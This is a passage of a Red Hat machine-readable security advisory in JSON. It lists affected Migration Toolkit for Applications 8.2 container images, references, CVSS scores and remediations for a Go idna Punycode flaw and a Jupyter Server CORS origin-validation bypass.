"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-39821"
},
{
"category": "external",
"summary": "RHBZ#2480756",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2480756"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-39821",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-39821"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-39821",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39821"
},
{
"category": "external",
"summary": "https://go.dev/cl/767220",
"url": "https://go.dev/cl/767220"
},
{
"category": "external",
"summary": "https://go.dev/issue/78760",
"url": "https://go.dev/issue/78760"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/iI-mYSI0lu8",
"url": "https://groups.google.com/g/golang-announce/c/iI-mYSI0lu8"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2026-5026",
"url": "https://pkg.go.dev/vuln/GO-2026-5026"
}
],
"release_date": "2026-05-22T15:01:21.462000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-07-21T22:10:10+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.",
"product_ids": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:43038"
},
{
"category": "workaround",
"details": "Upgrade to a fixed golang.org/x/net release that includes the idna correction, via updated golang or dependent package rebuilds.",
"product_ids": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 8.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "golang.org/x/net/idna: golang: net/http: golang.org/x/net/idna: Privilege escalation via incorrect Punycode label processing"
},
{
"cve": "CVE-2026-40110",
"cwe": {
"id": "CWE-625",
"name": "Permissive Regular Expression"
},
"discovery_date": "2026-05-05T22:01:09.643884+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2466912"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Jupyter Server. The Origin header validation, which uses Python\u0027s `re.match()` function, does not correctly validate incoming origins against allowed patterns. This allows a remote attacker to bypass Cross-Origin Resource Sharing (CORS) restrictions by crafting a malicious domain that partially matches a trusted one. Consequently, the attacker can make unauthorized cross-origin requests to the Jupyter Server API from an untrusted site, potentially leading to sensitive information disclosure or other unauthorized actions.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "jupyter-server: Jupyter Server: Cross-Origin Resource Sharing (CORS) bypass via improper Origin header validation",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64"
],
"known_not_affected": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-40110"
},
{
"category": "external",
"summary": "RHBZ#2466912",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2466912"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-40110",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-40110"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-40110",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40110"
},
{
"category": "external",
"summary": "https://github.com/jupyter-server/jupyter_server/commit/057869a327c46730afede3eab0ca2d2e3e74acea",
"url": "https://github.com/jupyter-server/jupyter_server/commit/057869a327c46730afede3eab0ca2d2e3e74acea"
},
{
"category": "external",
"summary": "https://github.com/jupyter-server/jupyter_server/commit/49b34392feaa97735b3b777e3baf8f22f2a14ed8",
"url": "https://github.com/jupyter-server/jupyter_server/commit/49b34392feaa97735b3b777e3baf8f22f2a14ed8"
},
{
"category": "external",
"summary": "https://github.com/jupyter-server/jupyter_server/pull/603",
"url": "https://github.com/jupyter-server/jupyter_server/pull/603"
},
{
"category": "external",
"summary": "https://github.com/jupyter-server/jupyter_server/security/advisories/GHSA-24qx-w28j-9m6p",
"url": "https://github.com/jupyter-server/jupyter_server/security/advisories/GHSA-24qx-w28j-9m6p"
}
],
"release_date": "2026-05-05T21:29:31.323000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-07-21T22:10:10+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.",
"product_ids": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:43038"
},
{
"category": "workaround",
"details": "Administrators should review and update the `allow_origin_pat` configuration in Jupyter Server to use a more precise regular expression. Ensure the pattern explicitly anchors to the end of the string (e.g., by adding `$` to the end of the regex) to prevent partial domain matches. After modifying the configuration, the Jupyter Server service must be restarted for the changes to take effect.",
"product_ids": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64",
